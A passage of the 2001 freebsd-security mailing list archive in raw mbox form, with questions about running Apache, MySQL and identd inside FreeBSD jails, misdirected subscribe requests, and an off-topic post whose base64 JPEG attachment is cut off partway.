Crist J. Clark                     |     cjclark@alum.mit.edu
                                   |     cjclark@jhu.edu
http://people.freebsd.org/~cjc/    |     cjc@freebsd.org

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Dec  5 14:52:52 2001
Delivered-To: freebsd-security@freebsd.org
Received: from ns.ulstu.ru (ns.ulstu.ru [62.76.34.36])
	by hub.freebsd.org (Postfix) with ESMTP id 2383637B426
	for <freebsd-security@freebsd.org>; Wed,  5 Dec 2001 14:52:48 -0800 (PST)
Received: by ns.ulstu.ru (Postfix-ULSTU, from userid 3909)
	id 9DD9C10780C; Thu,  6 Dec 2001 01:52:42 +0300 (MSK)
Date: Thu, 6 Dec 2001 01:52:42 +0300
From: Zhuravlev Alexander <zaa@ulstu.ru>
To: freebsd-security@freebsd.org
Subject: Apache+MySQL+Jail
Message-ID: <20011206015242.A87562@ulstu.ru>
Reply-To: zhuravlev alexander <zaa@ulstu.ru>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0pre2i
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

does anyone try to run Apache+MySQL under Jail ?
if so, could you point me to some additional 
information on this subject.
thanks.

--
zhuravlev alexander
 u l s t u  c t c
e-mail:zaa@ulstu.ru

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Dec  5 15:12:13 2001
Delivered-To: freebsd-security@freebsd.org
Received: from alisier.wanadoo.fr (smtp-rt-9.wanadoo.fr [193.252.19.55])
	by hub.freebsd.org (Postfix) with ESMTP id 7D03637B419
	for <freebsd-security@freebsd.org>; Wed,  5 Dec 2001 15:12:08 -0800 (PST)
Received: from mahonia.wanadoo.fr (193.252.19.58) by alisier.wanadoo.fr; 6 Dec 2001 00:12:01 +0100
Received: from aphrodite (80.11.242.71) by mahonia.wanadoo.fr; 6 Dec 2001 00:10:00 +0100
Message-ID: <001001c17de1$fc9855c0$0200a8c0@aphrodite>
From: "Benjamin Appert" <stipho@stipho.dyndns.org>
To: <freebsd-security@freebsd.org>
Subject: suscribe
Date: Thu, 6 Dec 2001 00:10:09 +0100
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_000D_01C17DEA.5DE40B50"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.00.2919.6700
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

C'est un message de format MIME en plusieurs parties.

------=_NextPart_000_000D_01C17DEA.5DE40B50
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable


------=_NextPart_000_000D_01C17DEA.5DE40B50
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META content=3D"text/html; charset=3Diso-8859-1" =
http-equiv=3DContent-Type>
<META content=3D"MSHTML 5.00.2920.0" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV>&nbsp;</DIV></BODY></HTML>

------=_NextPart_000_000D_01C17DEA.5DE40B50--


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Dec  5 15:44:36 2001
Delivered-To: freebsd-security@freebsd.org
Received: from db.nexgen.com (db.nexgen.com [66.92.98.149])
	by hub.freebsd.org (Postfix) with SMTP id 749D537B405
	for <freebsd-security@FreeBSD.ORG>; Wed,  5 Dec 2001 15:44:33 -0800 (PST)
Received: (qmail 5839 invoked from network); 5 Dec 2001 23:43:47 -0000
Received: from localhost.nexgen.com (HELO alexus) (root@127.0.0.1)
  by localhost.nexgen.com with SMTP; 5 Dec 2001 23:43:47 -0000
Message-ID: <000901c17de6$c6a49730$0d00a8c0@alexus>
From: "alexus" <ml@db.nexgen.com>
To: <freebsd-security@FreeBSD.ORG>
Subject: identd inside of jail
Date: Wed, 5 Dec 2001 18:44:26 -0500
Organization: NexGen
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

Hello

I'm posting on this thread on this list due to jail itself is a security
related issue, if this is wrong list i'll repost it on another list.

did anyone sucseed on making identd (from inetd) or any other identd to work
inside of jail?

the identd itself is working, however to make it work for outside world too
i put forward for port 113 using natd

su-2.05# grep 113 /etc/natd.conf
redirect_port tcp jail:113 113
su-2.05#

obviosly that wasn't enough..

port itself is open now, however the way ident works that's not enough..

any ideas would be welcome

Thanks in advance.


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Dec  5 16:51:31 2001
Delivered-To: freebsd-security@freebsd.org
Received: from azarasikun.azarasi.net (azarasikun.azarasi.net [61.200.60.52])
	by hub.freebsd.org (Postfix) with ESMTP id AC29237B419
	for <freebsd-security@freebsd.org>; Wed,  5 Dec 2001 16:51:28 -0800 (PST)
Received: from alpha.scitech-japan.co.jp ([210.248.15.228] helo=mail.azarasi.net)
	by azarasikun.azarasi.net with smtp (Exim 3.32 #1 (Debian))
	id 16Bml6-0007g5-00
	for <freebsd-security@FreeBSD.org>; Thu, 06 Dec 2001 09:51:28 +0900
Date: Thu, 06 Dec 2001 09:52:12 +0900
From: =?ISO-2022-JP?B?GyRCQmw4fUA1TEAbKEI=?= <taki-ma@azarasi.net>
X-Mailer: EdMax Ver2.84.2F
MIME-Version: 1.0
To: freebsd-security@FreeBSD.org
Subject: subscribe 
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Message-Id: <E16Bml6-0007g5-00@azarasikun.azarasi.net>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

subscribe freebsd-security@FreeBSD.org taki-ma@azarasi.net

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Dec  5 16:57:15 2001
Delivered-To: freebsd-security@freebsd.org
Received: from hotmail.com (f22.law15.hotmail.com [64.4.23.22])
	by hub.freebsd.org (Postfix) with ESMTP id 2722437B416
	for <freebsd-security@FreeBSD.org>; Wed,  5 Dec 2001 16:57:14 -0800 (PST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Wed, 5 Dec 2001 16:57:14 -0800
Received: from 24.217.156.2 by lw15fd.law15.hotmail.msn.com with HTTP;
	Thu, 06 Dec 2001 00:57:13 GMT
X-Originating-IP: [24.217.156.2]
From: "aman raheja" <amannetsec@hotmail.com>
To: taki-ma@azarasi.net
Cc: freebsd-security@FreeBSD.org
Subject: Re: subscribe
Date: Wed, 05 Dec 2001 18:57:13 -0600
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: <F22wTMqWiWqcL9d7tQ400012731@hotmail.com>
X-OriginalArrivalTime: 06 Dec 2001 00:57:14.0083 (UTC) FILETIME=[F1867B30:01C17DF0]
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org

You are doin the subscribe at the wrong place pal.
Refer the mailing lists section of FreeBSD.org for details


>From: ?�?�?�-� <taki-ma@azarasi.net>
>To: freebsd-security@FreeBSD.org
>Subject: subscribe
>Date: Thu, 06 Dec 2001 09:52:12 +0900
>
>subscribe freebsd-security@FreeBSD.org taki-ma@azarasi.net
>
>To Unsubscribe: send mail to majordomo@FreeBSD.org
>with "unsubscribe freebsd-security" in the body of the message


_________________________________________________________________
Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message


From owner-freebsd-security  Wed Dec  5 17:57:45 2001
Delivered-To: freebsd-security@freebsd.org
Received: from gramsc1.dyndns.org (h00609774e769.ne.mediaone.net [24.91.224.187])
	by hub.freebsd.org (Postfix) with ESMTP id 57D0437B419
	for <freebsd-security@freebsd.org>; Wed,  5 Dec 2001 17:57:06 -0800 (PST)
Received: from there (tr0tsky [10.0.0.4])
	by gramsc1.dyndns.org (8.12.1/8.12.1) with SMTP id fB61uuFp015583
	for <freebsd-security@freebsd.org>; Wed, 5 Dec 2001 20:56:58 -0500 (EST)?g
	(envelope-from resopmok@gramsc1.dyndns.org)�
Message-Id: <200112060156.fB61uuFp015583@gramsc1.dyndns.org>
From: Chris Thomas <resopmok@gramsc1.dyndns.org>
Reply-To: resopmok@gramsc1.dyndns.org
To: freebsd-security@freebsd.org
Subject: the best edited picture ever
Date: Wed, 5 Dec 2001 20:56:39 -0500
X-Mailer: KMail [version 1.3.1]
MIME-Version: 1.0
Content-Type: Multipart/Mixed;
  boundary="------------Boundary-00=_F2GW9TRAE923RF8QCLEP"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID: <freebsd-security.FreeBSD.ORG>
List-Archive: <http://docs.freebsd.org/mail/> (Web Archive)
List-Help: <mailto:majordomo@FreeBSD.ORG?subject=help> (List Instructions)
List-Subscribe: <mailto:majordomo@FreeBSD.ORG?subject=subscribe%20freebsd-security>
List-Unsubscribe: <mailto:majordomo@FreeBSD.ORG?subject=unsubscribe%20freebsd-security>
X-Loop: FreeBSD.org


--------------Boundary-00=_F2GW9TRAE923RF8QCLEP
Content-Type: text/plain;
  charset="iso-8859-1"
Content-Transfer-Encoding: 8bit

muahahahahaha
--------------Boundary-00=_F2GW9TRAE923RF8QCLEP
Content-Type: image/jpeg;
  name="Dodge_This_-_Revised.jpg"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Dodge_This_-_Revised.jpg"

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
